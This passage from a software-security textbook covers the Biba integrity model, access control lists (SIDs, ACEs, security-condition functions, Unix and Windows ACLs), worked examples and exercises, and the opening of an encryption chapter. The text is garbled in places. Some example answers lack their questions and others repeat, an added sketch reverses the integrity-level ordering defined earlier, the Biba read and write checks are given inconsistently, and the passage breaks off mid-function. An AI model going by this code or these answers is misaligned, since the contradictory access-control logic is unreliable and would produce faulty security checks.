classes” or “integrity levels.” As with Bell-LaPadula’s control
variable, an integrity level can easily be represented with an integer variable,
traditionally given the name IL.
Back to our newspaper example, one might define the integrity levels as the
following:
enum IntegrityLevel
{
UNSUBSTANTIATED, PRELIMINARY, SECONDARY, PRIMARY, VERIFIED
};
If we go back to our newspaper example, it should be relatively easy to assign
levels to various assets based on the level of confidence one has in the source.
There is one problem, however.
Consider the SECONDARY integrity level. In our scenario, this is defined as
“Information came from an expert in the field.” If an interview was collected from
a judge, then the interview will be assigned SECONDARY since the judge is an
expert in the field. However, as part of a later interview, the judge then talks
about technology. Though technology is not an area of her expertise, she still has
a SECONDARY integrity level. Therefore more weight is given to her opinion than
her station deserves. The problem with Biba, as it is with Bell-LaPadula, is that all
subjects with the same integrity level are treated the same.
Protection Level
The protection level is an assignment of an integrity level to an asset (o).
This protection level signifies the degree of confidence one can put in the asset:
that its contents are trustworthy. Back to our newspaper example: an asset with
the PRELIMINARY protection level would be treated with considerably more
skepticism than one with the VERIFIED protection level.
One can add a protection level to an asset by simply adding a member variable to
the structure or class:
IntegrityLevel protectionLevel;
As with the asset control component of the Bell-LaPadula model, the protection
level component of Biba is implemented as a single integer variable.
Control Value
Each subject wishing to obtain access to the asset (S) is given a control value (ILs).
This is obtained at authentication time. It works exactly the same as the subject
control mechanism of Bell-LaPadula except the result is an IntegrityLevel:
IntegrityLevel authenticate(string username, string password);
Observe that Biba makes no reference to individual users working on the system.
Instead, it deals only with a set of users, each of which defined by an integrity
level. Thus all primary sources are treated the same, as are all preliminary
sources.
Security Condition
Finally, at the point when the subject requests access to the asset (called
the “security condition”), the control value of the subject is compared against
that of the asset. As with Bell-LaPadula, the security condition returns a Boolean
value; one is either allowed to edit an asset or not.
The first type of security decision is one that determines whether a given subject
can edit a given object. This function takes two parameters: the integrity level of
the subject (called the control value) and the integrity level of the object (called
the protection level). If the subject (user) has sufficient credentials to edit the
object, then permission is granted. This can be handled with a simple greater-than
or equal-to operation ILs ≥ ILo.
bool securityConditionWrite(IntegrityLevel ilAsset,  /* asset */
                            IntegrityLevel ilSubject /* user  */)
{
   return ilSubject >= ilAsset;
}
In order to verify that this works, consider a secondary source (expert in the field)
attempting to edit a given StoryData object that currently has a preliminary level
of trust. Since the subject has a sufficient level of trust, the security condition
should allow access. Here controlValue = SECONDARY and protectionLevel
= PRELIMINARY. Since the value of SECONDARY is 2 and the value of PRELIMINARY
is 1, we have sufficient credentials to edit the StoryData object.
The second decision is to see whether a given source user can view a given
StoryData object. In this case, we have the journalist who is writing the actual
story that will go in the newspaper. The journalist has decided that only
secondary sources are sufficient for his purposes. Therefore, his controlValue is
SECONDARY. The journalist begins by requesting all the data that pertains to the
story. In this case, there are 82 individual StoryData objects, each of which has
varying levels of protection. When the journalist looks at the data, however, there
are only 19 StoryData objects returned. This is because there are 4 objects with
a VERIFIED protection level, 10 with PRIMARY, and 5 with SECONDARY. All the rest
are PRELIMINARY or UNSUBSTANTIATED. Since the lowest integrity level of any
data going into the story is SECONDARY and since the journalist himself has the
SECONDARY control value, the resulting story is also SECONDARY. The function
performing this integrity check is:
bool securityConditionRead(IntegrityLevel ilAsset,  /* asset */
                           IntegrityLevel ilSubject /* user  */)
{
   return ilAsset >= ilSubject;
}
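The two Biba conditions and the journalist example can be captured in a self-contained sketch (the names canRead() and canWrite() are chosen here to avoid confusion with the chapter's functions):

```cpp
#include <cassert>

enum IntegrityLevel { UNSUBSTANTIATED, PRELIMINARY, SECONDARY, PRIMARY, VERIFIED };

// Biba: writing needs subject trust at or above the asset (ILs >= ILo);
// reading needs asset trust at or above the subject (ILo >= ILs).
bool canWrite(IntegrityLevel ilAsset, IntegrityLevel ilSubject)
{
   return ilSubject >= ilAsset;
}
bool canRead(IntegrityLevel ilAsset, IntegrityLevel ilSubject)
{
   return ilAsset >= ilSubject;
}

// The SECONDARY journalist:
//   canWrite(PRELIMINARY, SECONDARY) -> true  (write-down permitted)
//   canRead (PRELIMINARY, SECONDARY) -> false (read-down restricted)
//   canRead (PRIMARY,     SECONDARY) -> true  (read-up permitted)
```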
Integration
To make an access control implementation sound, the programmer must put
security condition checks at all trust boundary junctions. This will be
demonstrated in the context of a simple program to store a collection of
newspaper articles:
Figure 11.5: DFD of a class before access control mechanisms are added
The code necessary to implement this simple program is the following: two
methods and one member variable.
class StoryCollection
{
public:
string retrieve(string name)
{
return stories[name];
}
void insert(string name, string story)
{
stories[name] = story;
}
private:
map <string /*name*/, string /*story*/> stories;
};
Of course no access control mechanisms yet exist with this simple container class.
We need to add checks at all the public methods in order to be able to make
integrity assurances to the user. This will be accomplished in much the same way
we added confidentiality assurances in our military plan example previously: we
will add asset-level checks and we will add collection-level checks.
Asset-level checks involve placing security condition checks on the assets
themselves. In our newspaper story example, all assets are treated as a simple
string. We will change that to make an asset a class.
Figure 11.6: DFD of a class with access control mechanisms
The implementation of the integration of the access control mechanism into the
Story class is very similar to what we did for the Plan class. In fact, the only
substantial difference is that the securityConditionRead() and
securityConditionWrite() are upside-down:
class Story
{
public:
Story(IntegrityLevel il) : ilAsset(il) {}
string read(IntegrityLevel ilSubject) const throw (char *)
{
if (!securityConditionRead(ilAsset, ilSubject)) throw "Read denied";
return this->story;
}
void write(string story, IntegrityLevel ilSubject) throw (char *)
{
if (!securityConditionWrite(ilAsset, ilSubject)) throw "Write denied";
this->story = story;
}
private:
string story;
IntegrityLevel ilAsset;
bool securityConditionRead(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
bool securityConditionWrite(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
};
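The two condition functions above are only declared, not defined. A sketch of their bodies, under the assumption (consistent with the securityCondition() shown later in this chapter) that the IntegrityLevel enumeration lists the most trusted level first, so a smaller numeric value means higher integrity:

```cpp
#include <cassert>

// Assumed ordering: the most trusted level comes first, so a smaller
// numeric value means higher integrity.
enum IntegrityLevel { PRIMARY, SECONDARY, PRELIMINARY, UNTRUSTED };

// Biba "no read down": the asset must be at least as trustworthy as the
// subject (numerically, a value no larger than the subject's).
bool securityConditionRead(IntegrityLevel ilAsset, IntegrityLevel ilSubject)
{
   return ilAsset <= ilSubject;
}

// Biba "no write up": the subject must be at least as trustworthy as the
// asset. Note that it is the read condition turned upside-down.
bool securityConditionWrite(IntegrityLevel ilAsset, IntegrityLevel ilSubject)
{
   return ilAsset >= ilSubject;
}
```

Each function is the other turned upside-down: a trusted subject may write down but not read down, while an untrusted subject may read up but not write up.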
From this code we can see that the only access to the story is through the two
public interfaces: read() and write(). This Story class now resides in our
StoryCollection class:
Figure 11.7: DFD of a class with an embedded data structure containing access control mechanisms
Notice how every instance of Story is protected as it travels into and out of the
class. The StoryCollection container is unaware of the access control
mechanism. The code is:
class StoryCollection
{
… code removed for brevity …
map <string /*name*/, Story> stories;
};
The second way to integrate Biba is to place the security condition checks on the
container that manages all the assets. The relevant portion of the code for this
design is the following (note that il refers to integrity level):
class StoryCollection
{
public:
… public methods with security condition checks, removed for brevity …
private:
map <string, string> stories;
map <string, IntegrityLevel> credentials;
bool securityConditionRead(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
bool securityConditionWrite(IntegrityLevel ilAsset,
IntegrityLevel ilSubject) const;
};
Since all public methods perform the appropriate security condition checks, we
can see that the Biba integrity assurances are met with this design.
Confidentiality & Integrity
While the Bell-LaPadula model might be sufficient for most systems’
confidentiality needs and while the Biba model might be sufficient for many
integrity needs, the two systems cannot coexist. This is particularly unfortunate
because most systems are required to make both confidentiality and integrity
assurances to the users.
For example, consider a music streaming service. This service allows individual
users to set up an account, containing billing information, music preferences,
account type, and a host of other settings. It turns out that there are two account
types: individual and family. The family account allows up to five additional users
to have access to the music though only the account owner can change the billing
information and other settings. Finally, there is an administrator who can both
read and write to any account in the system. As you can probably imagine, this
scenario involves a host of different confidentiality and integrity needs, many of
which cannot be easily placed in the confidentiality levels of Bell-LaPadula nor the
integrity levels of Biba.
ACLs
To address this need David Clark and David Wilson defined a model in 1987 that
provided the assurances of Bell-LaPadula and Biba in a single system: the Clark-
Wilson model (Clark & Wilson, 1987). This was accomplished by identifying a
collection of certification rules (CR1 through CR5) and a collection of enforcement
rules (ER1 through ER4). Confidentiality and integrity assurances can be made
through how transformation procedures are defined governing access to
constrained data items, each of which is expressed in terms of state transitions.
Unfortunately, the Clark-Wilson system proved difficult to implement and
configure. To address these challenges, ACLs were developed.
Access Control Lists (ACLs) are a system mathematically equivalent to the Clark-
Wilson model, designed with the intention of being much easier to define and
implement. An ACL is a list of permissions (typically Read, Write, and Execute)
paired with entities (individual users or named user groups). When a resource is
accessed, the request (e.g. Bob to read) is compared against the ACL (e.g. Bob to
write, Teachers to read/write, administrators to read/write) to make an access
control determination (in this case “deny”). ACLs have several components:
SID A Security ID (SID) is the unique identification of an individual or a group.
ACE An Access Control Entry (ACE) is a SID paired with permission (Read or Write).
ACL An Access Control List (ACL) is a list of ACEs defining permissions to access a
given resource.
ACE Request An ACE representing the access permission requested by a subject.
Security Condition A function returning whether a given access request is to be granted, taking an
ACE Request and an ACL as parameters.
Implementation
To implement ACLs on a given system, it is necessary to implement all three data
structures: the SID, the ACE, and the ACL. From here, it is necessary to implement
the security condition and finally integrate the ACL mechanism into the system.
SID
Recall that a Security ID (SID) is the unique identification of an individual or a
group. A SID is created on two occasions: when a user is added to the
system and when a group is created. Typically when a user authenticates on a
system, the authentication function returns a SID. Note that a SID, just like most
IDs, is just an integer.
typedef short SID; // good for 64k users. Should be enough!
The difference between the SID of an ACL and the control of Bell-LaPadula is that
a SID can refer to individuals whereas the control variable refers to levels. Thus
the authentication mechanism of an ACL is quite different from that of Bell-
LaPadula or Biba:
SID sidUser = authenticate(string username, string password);
Notice how this ACE takes only 4 bytes (2 bytes for the SID, 1 byte for the read,
and 1 byte for the write). This is a very compact data structure.
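The code for this simple two-permission ACE appears to have been lost to a page break in this copy; a reconstruction matching the byte layout just described (the field names are assumptions) would be:

```cpp
#include <cassert>

typedef short SID; // as defined earlier in the chapter

// Hypothetical layout of the simple ACE described above: a 2-byte SID
// plus one byte each for the read and write permissions.
struct ACE
{
   SID  sid;   // who this entry applies to
   bool read;  // may the subject read?
   bool write; // may the subject write?
};
// 2 + 1 + 1 bytes, for a total of 4 on typical compilers
```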
As mentioned previously, some systems may have a very complex set of access
types. These too can be represented in a very compact format if we use a bit-field
to represent all the different flavors of access:
// different bit-fields representing varying levels of access
#define ACCESS_READ 0x01
#define ACCESS_WRITE 0x02
#define ACCESS_EXECUTE 0x04
#define ACCESS_MODIFY 0x08
#define ACCESS_NOT_READ 0x10
#define ACCESS_NOT_WRITE 0x20
#define ACCESS_NOT_EXECUTE 0x40
#define ACCESS_NOT_MODIFY 0x80
/********************************************************
* ACE
* A complex ACE where eight different levels of access
* are represented. To save space, each level of access
* is represented as a single bit so the entire access
* component of the class takes only a single byte.
********************************************************/
class ACE
{
public:
SID sid;
bool canRead() const { return (access & ACCESS_READ ); }
bool canWrite() const { return (access & ACCESS_WRITE ); }
bool canExecute() const { return (access & ACCESS_EXECUTE ); }
bool canModify() const { return (access & ACCESS_MODIFY ); }
bool canNRead() const { return (access & ACCESS_NOT_READ ); }
bool canNWrite() const { return (access & ACCESS_NOT_WRITE ); }
bool canNExecute() const { return (access & ACCESS_NOT_EXECUTE); }
bool canNModify() const { return (access & ACCESS_NOT_MODIFY ); }
private:
char access; // one bit per access type, as described above
};
Notice how the ACE is very small in memory, only a single char plus a short. Using
bit-wise operators saves a lot of space when the number of instances of a given
class is large.
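The bit-wise tests above can be verified in isolation; this sketch repeats three of the masks and combines two of them the way a caller would:

```cpp
#include <cassert>

// the same masks defined above
#define ACCESS_READ    0x01
#define ACCESS_WRITE   0x02
#define ACCESS_EXECUTE 0x04

// grant read and execute by OR-ing their masks into a single byte;
// the can*() methods above test such a byte with the & operator
const char access = ACCESS_READ | ACCESS_EXECUTE;
```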
ACL
The final data-structure associated with an ACL is the Access Control List (ACL)
itself. As you have probably figured out, the access control mechanism is named
after this data structure. An ACL is a list of ACEs defining permissions to access a
given resource. There are several parts to this definition. We will explore each
in turn.
An ACL is a list First, an ACL is a list. This means that order matters. When we read an ACL,
we do so from one side (usually from the head or from the lowest index) and
proceed to the end or until some end condition is met. This means that an ACL
consisting of [ACE1, ACE2] is not the same thing as another ACL consisting of
[ACE2, ACE1].
The ACL consists of ACEs Second, the ACL consists of ACEs. Recall that an ACE specifies an individual
access specification. The collection of these specifications defines an ACL.
An ACL is attached to a resource Third, the ACL defines permission to access a given resource. This means that
an ACL is attached to a resource that is to be protected.
Some ACL implementations consist of a list of fixed size. This is true with the most
common file system implementation on Unix and Linux systems. Here, the ACL
always consists of three entries: user, group, and public.
For example, consider our music streaming service. One asset on this system may
be the billing information associated with a given account. Of course the account
owner (sidSam) will need to have read and write access to the data. The other
members of the account (sidSue, sidBabyCary, etc.) will not. However, the
billing service (sidBilling) will need to have read permission and the account
manager (sidSly) will need to have read and write permission. Also, the group
of users who provide customer support (sidCustomer) will have read and write
access. Finally, an auditing program (sidAudit) will periodically write a record to
the file but does not need to read. Thus the ACL for this item is the following:
sidSam Read, Write
sidBilling Read
sidSly Read, Write
sidCustomer Read, Write
sidAudit Write
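Expressed with the simple two-permission ACE used earlier in the chapter, that policy might look like the following (the SID values and type layouts are assumptions made for illustration):

```cpp
#include <cassert>
#include <vector>

typedef short SID;
struct ACE { SID sid; bool read; bool write; }; // hypothetical simple ACE
typedef std::vector<ACE> ACL;

// hypothetical SID values for the subjects named in the table above
const SID sidSam = 1, sidBilling = 2, sidSly = 3, sidCustomer = 4, sidAudit = 5;

// the billing-information ACL from the table above
const ACL aclBilling =
{
   { sidSam,      true,  true  },  // account owner: read and write
   { sidBilling,  true,  false },  // billing service: read only
   { sidSly,      true,  true  },  // account manager: read and write
   { sidCustomer, true,  true  },  // customer-support group: read and write
   { sidAudit,    false, true  }   // auditing program: write only
};
```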
ACE Request
When a subject such as a user or another part of the system requests access to a
given asset, the system generates an ACE request. As you can imagine, the data-
type of this is an ACE. The difference between an ACE request and an ACE residing
in an ACL is that the former represents a request for access while the latter
represents the stated policy.
For example, consider the music streaming service example previously discussed.
In this case, Sam wishes to update his billing information with a new credit card
number. To do so, he creates an ACE request:
sidSam Write
From this ACE, it should be obvious that Sam is requesting permission to Write to
a given asset.
Security Condition
The next piece to the ACL system is the security condition. Recall that both Bell-
LaPadula and Biba used a security function to determine if a given subject had
permission to access an asset. ACLs use a similar function except there will not be
separate functions for read and write requests.
For example, consider the setCreditCard() method in a Billing class. This
function will need to know the credit card number that is to be applied to a given
account. It also needs to check that a given user has permission to make this
change.
void Billing :: setCreditCard(const CreditCard & newCard, SID sid)
{
ACE aceRequest(sid, false /*read*/, true /*write*/);
if (securityCondition(aceRequest, acl))
card = newCard;
}
Notice that the first thing this method does is to create an ACE request from the
SID. Since this function is a setter, we create an ACE with the “write” bit set to
true and the “read” bit set to false. Once this aceRequest is built, we can then
compare it to the ACL that is a member variable in the Billing class. If the
securityCondition() permission accepts this ACE request, then the credit card
information is updated.
So how does this securityCondition() function work? This depends a great
deal on how ACLs are implemented in the system. First, we will consider the
simplest possible scenario. Here, all the ACE permissions are positive: an ACE can
grant a subject the ability to read an asset, but it cannot state that a subject is
forbidden from reading it. Also, there are no
notions of groups. In this case, the securityCondition() function might be
something like this:
/******************************************************************************
* SECURITY CONDITION
* Simplistic model with only one positive permission and no groups.
******************************************************************************/
bool securityCondition(const ACE & aceRequest, const ACL & acl)
{
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (acl[i].sid == aceRequest.sid) // does this ACE apply?
{
if (acl[i].read && aceRequest.read)     // if the ACE grants read
return true;                            // and read was requested
if (acl[i].write && aceRequest.write)   // if the ACE grants write
return true;                            // and write was requested
}
return false; // false if no permissions
} // were granted
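A quick exercise of this function (the ACE and ACL types are sketched as a plain struct and a vector, an assumption consistent with the loop above):

```cpp
#include <cassert>
#include <vector>

typedef short SID;
struct ACE { SID sid; bool read; bool write; };
typedef std::vector<ACE> ACL;

// the simple security condition from above, repeated so this stands alone
bool securityCondition(const ACE & aceRequest, const ACL & acl)
{
   for (int i = 0; i < (int)acl.size(); i++) // loop through all the ACEs
      if (acl[i].sid == aceRequest.sid)      // does this ACE apply?
      {
         if (acl[i].read && aceRequest.read)
            return true;
         if (acl[i].write && aceRequest.write)
            return true;
      }
   return false; // no permission was granted
}

// a sample policy: SID 1 may only read, SID 2 may read and write
const ACL aclSample = { {1, true, false}, {2, true, true} };
```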
This gets more complicated if we allow the client to request both a read and a
write at the same time. Here, a more robust security condition will be required:
/******************************************************************************
* SECURITY CONDITION
* Positive permissions and no groups; read and write may be
* requested at the same time.
******************************************************************************/
bool securityCondition(const ACE & aceRequest, const ACL & acl)
{
bool readAllowed = false; // initially do not allow read or write
bool writeAllowed = false;
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (acl[i].sid == aceRequest.sid) // does this ACE apply?
{
if (acl[i].read) // we have READ permission
readAllowed = true;
if (acl[i].write) // we have WRITE permission
writeAllowed = true;
}
// grant the request only if every permission asked for was found
return (!aceRequest.read || readAllowed) &&
(!aceRequest.write || writeAllowed);
}
The next level of complication occurs when we add groups to the mix. Here, we
need to be able to tell if a given SID is a member of a group, and we need to be
able to tell if a given SID represents a group. Both of these conditions need to be
checked.
To do this, we will need two functions:
bool isGroup(SID sid);
bool isMember(SID sidUser, SID sidGroup);
From here, we can create a function to see if a given SID from an ACE request
(sidRequest) pertains to a given SID in an ACE residing in an ACL (sidACL).
bool sidMatch(const SID & sidRequest, const SID & sidACL)
{
// sidRequests should come from individuals, not groups
assert(!isGroup(sidRequest));
// if both SIDs are the same, either individuals or groups, then they match
if (sidRequest == sidACL)
return true;
// otherwise they match only when the ACL entry names a group
// and the requesting individual is a member of that group
return isGroup(sidACL) && isMember(sidRequest, sidACL);
}
The loop inside securityCondition() then calls sidMatch() instead of comparing
the SIDs directly:
for (int i = 0; i < acl.size(); i++) // loop through all the ACEs
if (sidMatch(aceRequest.sid, acl[i].sid)) // does this ACE apply?
{
if (acl[i].read) // we have READ permission
readAllowed = true;
if (acl[i].write) // we have WRITE permission
writeAllowed = true;
}
Unix and Windows
On Unix platforms (Linux, OSX, etc.), ACLs are a list of three ACEs: User, Group,
and Public. Each ACE can have three permission types: Read, Write, and Execute.
Consider the following ACL:
drwxr-xr-- 11 JamesNH faculty 4096 May 26 15:14 cs470
The first letter (d) signifies the resource is a directory. The next three (rwx)
indicate that the user (JamesNH in this case) has Read, Write, and Execute
privileges. The next three (r-x) indicate the group (faculty in this case) has Read
and Execute privileges. The final three (r--) indicate that everyone on the system has
read permissions. At validation time, permission is granted by comparing the ACE
request against the ACL policy. This is accomplished by comparing each item in
the ACL with the ACE of the request. If permission requested by the ACE is
validated by the ACL, then the resource request is granted. If, for example, a
member of the faculty group were to try to write to the directory, then the
request ACE [faculty, -w-] would be created. It would first be compared against
the owner component of the ACL [JamesNH, rwx] and the SID mismatch would
yield non-validation. Next, it would be compared against the group component
of the ACL [faculty, r-x]. Since the SID would match, this entry would decide the
request, and the lack of the Write bit would result in a denial. The public ACE would
never be checked.
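The owner-then-group-then-other ordering just described can be sketched as follows (the string SIDs and the struct layout are assumptions made for readability, not the actual kernel implementation):

```cpp
#include <cassert>
#include <string>

// hypothetical types: one entry per permission class
struct ACE { std::string sid; bool read; bool write; bool execute; };
struct UnixACL { ACE owner; ACE group; ACE other; };

// The request is compared against owner, then group, then other; the first
// entry whose SID matches decides, and later entries are never consulted.
bool unixCheck(const ACE & request, const UnixACL & acl)
{
   const ACE & entry = (request.sid == acl.owner.sid) ? acl.owner
                     : (request.sid == acl.group.sid) ? acl.group
                     : acl.other;
   return (!request.read    || entry.read)
       && (!request.write   || entry.write)
       && (!request.execute || entry.execute);
}

// drwxr-xr-- JamesNH faculty cs470, as in the listing above
const UnixACL cs470 = { {"JamesNH", true, true,  true },
                        {"faculty", true, false, true },
                        {"anyone",  true, false, false} };
```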
Access Control is a bit more complex on the Microsoft Windows NT platform.
There, an ACL can either allow the request of a resource (e.g. Read = Allow),
explicitly deny a request (e.g. Read = Deny), or not specify (e.g. Read =). In this
case, the order in which the ACL is read becomes important. For the example
below, the ACEs in the ACL are: {Authenticated Users, SYSTEM,
Administrators, and Users=HELFRICHJ}. The verification engine begins at the
start of the ACL. If an item in the ACL (an ACE of course) explicitly allows or denies
access to the resource, then that permission is returned and the loop terminates.
If all the entries in the ACL are checked and no specific permissions are
mentioned, then the request is denied.
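A sketch of that ordered evaluation, reduced to a single Read permission (the types are invented for illustration; note that Windows itself falls back to an implicit deny when no ACE speaks to the request):

```cpp
#include <cassert>
#include <vector>

typedef short SID;
enum Permission { UNSPECIFIED, ALLOW, DENY };

// hypothetical Windows-style ACE: each permission may be explicitly
// allowed, explicitly denied, or left unspecified
struct WinACE { SID sid; Permission read; };
typedef std::vector<WinACE> WinACL;

// walk the list in order; the first explicit ALLOW or DENY that applies
// wins, and an unmatched request falls through to an implicit deny
bool canRead(SID sid, const WinACL & acl)
{
   for (int i = 0; i < (int)acl.size(); i++)
      if (acl[i].sid == sid && acl[i].read != UNSPECIFIED)
         return acl[i].read == ALLOW;
   return false; // implicit deny
}

// a sample ACL: an early DENY for SID 1 shadows the later ALLOW
const WinACL aclSample = { {1, DENY}, {1, ALLOW}, {2, ALLOW} };
```

This is why ACE order matters on Windows: moving the DENY entry after the ALLOW would reverse the outcome for SID 1.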
Examples
1. Q Name the form of access control that would be appropriate in the following
scenario: I am posting information for my business on a publicly available web
site.
A Integrity. Since everyone has read access, there are no confidentiality concerns.
I am only striving to make sure the information is accurate.
2. Q Name the form of access control that would be appropriate in the following
scenario: At the end of the semester, I clean out my notebook by throwing
everything into the trash can.
3. Q Name the form of access control that would be appropriate in the following
scenario: I post some pictures from last night’s party on Facebook.
A Confidentiality & Integrity. I hope that only the people involved in the party and
perhaps my friends should have access to the pictures. Most people do not take
this step, but they should! Additionally, I hope that others do not alter my
pictures or text to make me look bad. Integrity assurances should address this
issue.
A Either physical or administrative. It is physical because the cleaning crew can get
access to the library with keys after hours. It is administrative because the
“guards” at the entrances will not let you in if you look like you will pose a threat
to the people inside.
A At first this appears to have no access control mechanism. However, the police
will remove you from the park if you are violating the rules. This is
administrative.
7. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. A class called “Addresses” contains this list,
allowing the client to get the address with a call to the Address::get() method
and allowing the client to modify a given entry with the Address::set()
method. Our assignment is to modify the program to provide confidentiality
assurances.
8. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. Our assignment is to modify the program to
provide integrity assurances.
A The obvious choice is the Biba model. First, we need to assign trustworthiness
levels to the various users:
Integrity Level Subject
PRIMARY God, ChuckNorris
SECONDARY President, Professor
PRELIMINARY Student, Parent, Batman
UNTRUSTED Everyone else
Next, we need to assign an integrity level to the various assets:
Integrity Level Asset
PRIMARY WhiteHouse, King
SECONDARY NYSE, OperaHouse
PRELIMINARY HollywoodSign, Dr.Helfrich
UNTRUSTED BatCave, Hogwarts
The final step is to modify the code to add the necessary access checks. We will
need to authenticate the user to obtain an integrity level based on the
username. We will need to add an IL variable to all the address data items.
Finally, at modification time (the Address::set() method), we need to verify
that the user has access to the asset. The security decision is made in the
securityCondition() method:
bool Addresses :: securityCondition(const IntegrityLevel & ilAsset,
const IntegrityLevel & ilSubject)
{
return ilAsset >= ilSubject;
}
9. Q Consider a program designed to store a collection of addresses where each
address is accessed by name. A class called “Addresses” contains this list,
allowing the client to get the address with a call to the Address::get() method
and allowing the client to modify a given entry with the Address::set()
method. Our assignment is to modify the program to provide confidentiality
assurances.
A The obvious choice is ACLs. We will do this Linux style with a fixed ACL length of
3. This means that the three ACEs in each ACL will be owner, group, and public.
Thus, we need to start by identifying our groups. We will create two:
superheroes and leaders:
Superheroes Leaders
God God
ChuckNorris ChuckNorris
Batman Batman, President, Professor, Parent
Next, we will need to determine ACLs for every asset.
Asset owner group public
Batcave Batman RW Superheroes RW Public --
Hogwarts Dumbledore R- Superheroes RW Public --
HollywoodSign CityLA RW Superheroes RW Public R-
Dr.Helfrich Helfrich RW Leaders RW Public R-
WhiteHouse President R- Superheroes RW Public R-
NYSE InterExc RW Leaders RW Public R-
OperaHouse SydneyOpera RW Leaders RW Public R-
From this table, we can see that the President knows where the White House is,
but cannot change that location. We can also see that Intercontinental Exchange
owns the New York Stock Exchange (NYSE) and is both aware of the location and
can change the location. That location is also public knowledge. Batman knows
the location of the Batcave and can change it, as can God and Chuck Norris. The
public neither can change the location nor knows the location. The final step is
to modify the code to add the necessary access checks. We will need to
authenticate the user to obtain a SID based on the username. We will need to
attach an ACL to each address data item. Finally, at access
time (the Address::get() method and the Address::set() method), we need to
verify that the user has access to the asset. The security decision is made in the
securityCondition() method:
bool Addresses :: securityCondition(const ACL & aclAsset,
const ACE & aceRequest) const
{
// try owner first
if (aceRequest.sid == aclAsset.owner.sid)
{
if (aceRequest.read)
return aclAsset.owner.read;
if (aceRequest.write)
return aclAsset.owner.write;
assert(false); // we should never be here!
return false;
}
// then try the group, using the isMember() function from earlier
if (isMember(aceRequest.sid, aclAsset.group.sid))
return aceRequest.read ? aclAsset.group.read : aclAsset.group.write;
// finally fall back on the public entry
return aceRequest.read ? aclAsset.publicAce.read : aclAsset.publicAce.write;
}
Exercises
1 Name the form of access control that would be appropriate in the following
scenarios:
- I record private thoughts in my journal every night.
- A politician makes a speech representing his foreign policy views on the
Middle East.
- I would like to collaborate with my teammates on a group project.
4 The root of the Bell-LaPadula access control model is their definition of security.
Find their definition of security in the paper and paraphrase it in your own
words.
5 Define the following variables in the Bell-LaPadula model
- S
- O
- C
- K
- A
- R
- D
6 Define the C++ data structure(s) necessary to represent the Bell-LaPadula notion
of access control.
8 Define the C++ data structure(s) necessary to represent the Biba notion of
control.
9 Which of the following concepts match the ACL model:
- Data integrity
- State transitions
- Read down prohibited
- Read, write, execute
- Write up allowed
- A number of states
- ACE, SID
- Read down allowed
- Certification rules
- Keep secret things secret
- Write-down permitted
- Read-up prevented
- Write-up allowed
- Unconfirmed
11 Define the C++ data structure(s) necessary to represent the ACL notion of
control.
Problems
1 Start with a program of your choice. Modify this program to provide
confidentiality assurances by implementing the Bell-LaPadula system. Please
use the following permissions:
- Bob, Hans: access to everything
- Sam, Sue, Sly: access to name and weight
- Everyone else: no access
2 Start with a program of your choice. Modify this program to provide integrity
assurances by implementing the Biba system. Please use the following
permissions:
- Bob: access to everything
- Hans: access to scores but not weight
- Sam, Sue, Sly: no access
- Everyone else: no access
3 Please take a close look at how the Unix system implements ACLs and how the
Microsoft Windows NT platform implements ACLs. On the surface, they may
seem quite different. Your job is to determine whether one is more powerful /
descriptive than the other. In other words:
- Can any Unix ACL policy be expressed in terms of a Microsoft Windows NT
ACL?
- Can any Microsoft Windows NT ACL policy be expressed in terms of a Unix
ACL?
Chapter 12: Encryption
Encryption algorithms (otherwise known as ciphers) are tools commonly employed by software engineers
to provide security assurances. It is not important that you memorize these algorithms or even have more
than a general understanding of how they work. The critical skill to learn here is how to apply encryption
algorithms to solve security problems.
Alice Alice is the originator of an encrypted message. It is the goal of Alice to send a
message in such a way that only the intended recipient (Bob) can receive it. The
method Alice chooses needs to provide confidentiality (only Bob will be able to
read it), integrity (the message will reach Bob unaltered), and availability (the
message will eventually make it to Bob). Note that the encryption algorithm only
addresses the issue of confidentiality and integrity. The channel of
communication addresses the availability variable in the equation.
Bob Bob is the recipient of the message. It is the goal of Bob to establish the
authenticity of the message. In other words, Bob needs confirmation that the
message came from Alice and the message is unaltered. One can remember Alice
and Bob because the message goes from A to B.
Eve Eve is an eavesdropper in the communication between Alice and Bob. Alice and
Bob do not wish for Eve to be able to read the message or to alter the message.
Typically, Eve’s first goal is to disclose Alice’s message. Frequently she also
wishes to alter the message. When all else fails, she strives to deny Bob the
ability to receive the message. One can remember the name Eve because
it comes from “Eavesdropper.” Another name commonly found in the literature
is “Trudy,” short for “intruder.”
Encryption algorithms provide the confidentiality and integrity services
demanded by Alice and Bob by transforming the message into a format Eve
cannot read. The original message, called plaintext because it can be read by
anyone, is converted by Alice using an encryption algorithm into a presumably
unreadable format called the ciphertext or cryptogram. Bob, upon receiving the
ciphertext, decrypts the message using the same algorithm, recovering Alice’s
original plaintext message. The process is successful if Eve cannot decrypt the ciphertext
and if she cannot alter the ciphertext without Bob’s knowledge.
Figure 12.1: The three characters in most encryption scenarios: Alice, Bob, and Eve
To see how encryption algorithms can be useful tools to address security
concerns, we will first learn how they work and then see several applications in
security problems.
How Encryption Algorithms Work
An encryption algorithm is a function that transforms plaintext messages Mp into
ciphertext messages Mc. The security of this function C does not come from the
secrecy of the algorithm which transforms the plaintext message into a ciphertext
message. Instead, it comes from the secret password or key (called K for “key”)
which dictates this process. Thus we can describe the encryption process as:
Mc ← C(Mp, K)
In this case, Alice will generate the ciphertext which will then be sent to Bob:
Figure 12.2: Alice sending an encrypted message to Bob
The problem is slightly more complex than this. Some encryption algorithms use
a different method to encrypt a message than is used to decrypt it. The encryption
function is marked with a + symbol and the decryption function with a – symbol:
Mc ← C+(Mp, K)
Mp ← C-(Mc, K)
Here Alice will encrypt her plaintext message Mp with C+(Mp, K). That ciphertext Mc
is then sent to Bob through a potentially insecure channel such as the Internet.
Bob then receives this message and retrieves the plaintext message using the
decryption algorithm C-(Mc, K).
Figure 12.3: Alice sending a message to Bob and Bob decrypting the message
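A toy example makes the notation concrete. Here C+ and C- happen to be the same XOR operation, so this is a (hopelessly weak) symmetric cipher:

```cpp
#include <cassert>
#include <string>

// A toy illustration of Mc <- C+(Mp, K) and Mp <- C-(Mc, K). With XOR,
// C+ and C- happen to be the same function, making this a symmetric
// cipher, and one far too weak for any real use.
std::string cipherXor(const std::string & message, char key)
{
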